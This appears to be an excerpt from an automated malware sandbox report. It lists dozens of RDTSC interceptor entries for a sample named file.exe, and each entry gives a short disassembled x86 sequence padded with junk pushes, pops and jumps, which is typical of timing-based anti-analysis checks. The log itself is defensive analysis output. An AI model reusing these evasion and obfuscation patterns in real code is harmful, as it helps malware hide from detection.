                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDD58 second address: DBDD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jng 00007F1228D24AB6h 0x0000000c jmp 00007F1228D24ABEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDFD9 second address: DBDFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F122870CBC6h 0x0000000a je 00007F122870CBC6h 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jc 00007F122870CBC6h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDFF7 second address: DBE018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F1228D24AC8h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBE018 second address: DBE01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC463D second address: DC4643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4643 second address: DC4649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4649 second address: DC4652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC47B9 second address: DC47BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC47BD second address: DC47E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1228D24AC8h 0x0000000b pushad 0x0000000c jne 00007F1228D24AB6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4EA7 second address: DC4EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4EAB second address: DC4EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5165 second address: DC5195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F122870CBC6h 0x0000000a jmp 00007F122870CBD5h 0x0000000f popad 0x00000010 pushad 0x00000011 jnc 00007F122870CBC6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 je 00007F122870CBC6h 0x0000001f popad 0x00000020 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5195 second address: DC51A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABAh 0x00000007 js 00007F1228D24ABCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC56EA second address: DC56F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC56F2 second address: DC56F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F7B second address: DC5F84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F84 second address: DC5F8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F8A second address: DC5F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC5F95 second address: DC5FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABFh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC627A second address: DC627E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC627E second address: DC629B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F1228D24AC2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA062 second address: DCA066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA1D8 second address: DCA1E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1228D24AB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA34D second address: DCA353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA353 second address: DCA372 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1228D24AB6h 0x00000008 jmp 00007F1228D24AC1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA372 second address: DCA37C instructions: 0x00000000 rdtsc 0x00000002 js 00007F122870CBC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA4E2 second address: DCA4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F1228D24AB6h 0x0000000c jne 00007F1228D24AB6h 0x00000012 jno 00007F1228D24AB6h 0x00000018 popad 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA7CB second address: DCA7D5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F122870CBC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCA8FF second address: DCA90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F1228D24AB6h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF3E0 second address: DCF3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCF3E4 second address: DCF3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B47 second address: DD6B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B4D second address: DD6B58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B58 second address: DD6B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B60 second address: DD6B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1228D24AB8h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6B71 second address: DD6B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F122870CBC6h 0x0000000a jnl 00007F122870CBC6h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4C9A second address: DD4CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4CA0 second address: DD4CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4CA5 second address: DD4CE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F1228D24ABDh 0x0000000f pushad 0x00000010 jmp 00007F1228D24AC6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55006A3 second address: 55006B1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55006B1 second address: 55006C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55006C4 second address: 5500705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F122870CBCDh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F122870CBCEh 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F122870CBD7h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55005B6 second address: 55005F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F1228D24AC6h 0x00000015 sub al, FFFFFFB8h 0x00000018 jmp 00007F1228D24ABBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55005F8 second address: 550063F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F122870CBCEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F122870CBD7h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550063F second address: 5500645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500381 second address: 55003BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F122870CBCCh 0x00000011 add cl, FFFFFFE8h 0x00000014 jmp 00007F122870CBCBh 0x00000019 popfd 0x0000001a mov dh, cl 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55003BE second address: 55003D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510124 second address: 5510133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510133 second address: 551015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1228D24ABCh 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551015F second address: 55101A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD1h 0x00000008 pushfd 0x00000009 jmp 00007F122870CBD0h 0x0000000e adc ch, 00000038h 0x00000011 jmp 00007F122870CBCBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ax, bx 0x00000021 mov ax, dx 0x00000024 popad 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55101A1 second address: 55101A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55101A7 second address: 55101AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552037C second address: 5520382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520382 second address: 5520386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520386 second address: 552038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552038A second address: 55203A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F122870CBCBh 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203A0 second address: 55203A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203A7 second address: 55203BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F122870CBCAh 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203BD second address: 55203C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203C3 second address: 55203C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203C7 second address: 55203CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203CB second address: 552040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F122870CBD9h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov edi, ecx 0x00000015 mov si, FCAFh 0x00000019 popad 0x0000001a and dword ptr [eax], 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F122870CBD1h 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552040F second address: 552046A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 pushfd 0x00000007 jmp 00007F1228D24AC3h 0x0000000c sub esi, 19BE9A9Eh 0x00000012 jmp 00007F1228D24AC9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and dword ptr [eax+04h], 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007F1228D24AC3h 0x00000027 pop eax 0x00000028 mov esi, edx 0x0000002a popad 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500554 second address: 5500559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55201F2 second address: 552022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1228D24ABEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1228D24ABEh 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552022F second address: 5520270 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F122870CBD6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F122870CBD7h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520270 second address: 552027F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55407B1 second address: 55407B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55407B6 second address: 5540835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1228D24ABDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov esi, 3F236E63h 0x00000015 pushfd 0x00000016 jmp 00007F1228D24AC8h 0x0000001b jmp 00007F1228D24AC5h 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F1228D24ABEh 0x00000029 xchg eax, ecx 0x0000002a jmp 00007F1228D24AC0h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F1228D24ABEh 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540835 second address: 554085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD1h 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, 65BAh 0x00000016 movsx edx, si 0x00000019 popad 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554085B second address: 5540908 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1228D24AC3h 0x00000008 mov edi, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [76FA65FCh] 0x00000012 pushad 0x00000013 mov dl, ah 0x00000015 jmp 00007F1228D24ABDh 0x0000001a popad 0x0000001b test eax, eax 0x0000001d jmp 00007F1228D24ABEh 0x00000022 je 00007F129A707B80h 0x00000028 pushad 0x00000029 mov dx, ax 0x0000002c mov dl, al 0x0000002e popad 0x0000002f mov ecx, eax 0x00000031 pushad 0x00000032 push edi 0x00000033 mov bl, cl 0x00000035 pop edi 0x00000036 pushfd 0x00000037 jmp 00007F1228D24AC8h 0x0000003c and ecx, 7598BE18h 0x00000042 jmp 00007F1228D24ABBh 0x00000047 popfd 0x00000048 popad 0x00000049 xor eax, dword ptr [ebp+08h] 0x0000004c jmp 00007F1228D24ABFh 0x00000051 and ecx, 1Fh 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F1228D24AC5h 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540908 second address: 5540918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F122870CBCCh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540918 second address: 554091C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 554091C second address: 5540985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e call 00007F122870CBD9h 0x00000013 pop esi 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F122870CBD7h 0x0000001b mov ax, CA5Fh 0x0000001f popad 0x00000020 popad 0x00000021 leave 0x00000022 jmp 00007F122870CBD2h 0x00000027 retn 0004h 0x0000002a nop 0x0000002b mov esi, eax 0x0000002d lea eax, dword ptr [ebp-08h] 0x00000030 xor esi, dword ptr [00BA2014h] 0x00000036 push eax 0x00000037 push eax 0x00000038 push eax 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c push eax 0x0000003d call 00007F122D0EDC9Fh 0x00000042 push FFFFFFFEh 0x00000044 pushad 0x00000045 mov cl, 74h 0x00000047 push eax 0x00000048 push edx 0x00000049 mov ebx, 34F2910Ch 0x0000004e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540985 second address: 55409D2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1228D24AC5h 0x00000008 sbb ax, 67E6h 0x0000000d jmp 00007F1228D24AC1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007F1228D24AC3h 0x0000001f movzx ecx, dx 0x00000022 popad 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55409D2 second address: 5540A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007F122D0EDD08h 0x00000011 mov edi, edi 0x00000013 jmp 00007F122870CBD0h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F122870CBD0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F122870CBCDh 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540A1E second address: 5540A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540A24 second address: 5540A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5540A2A second address: 5540A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F003A second address: 54F004D instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, 06E6h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 movsx edx, si 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F004D second address: 54F00BB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1228D24AC2h 0x00000008 or esi, 01510288h 0x0000000e jmp 00007F1228D24ABBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F1228D24AC8h 0x0000001c sub si, 64E8h 0x00000021 jmp 00007F1228D24ABBh 0x00000026 popfd 0x00000027 popad 0x00000028 and esp, FFFFFFF8h 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F1228D24AC5h 0x00000032 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F00BB second address: 54F00D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F00D8 second address: 54F0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 39h 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F1228D24AC7h 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ax, DFA1h 0x00000016 rdtsc
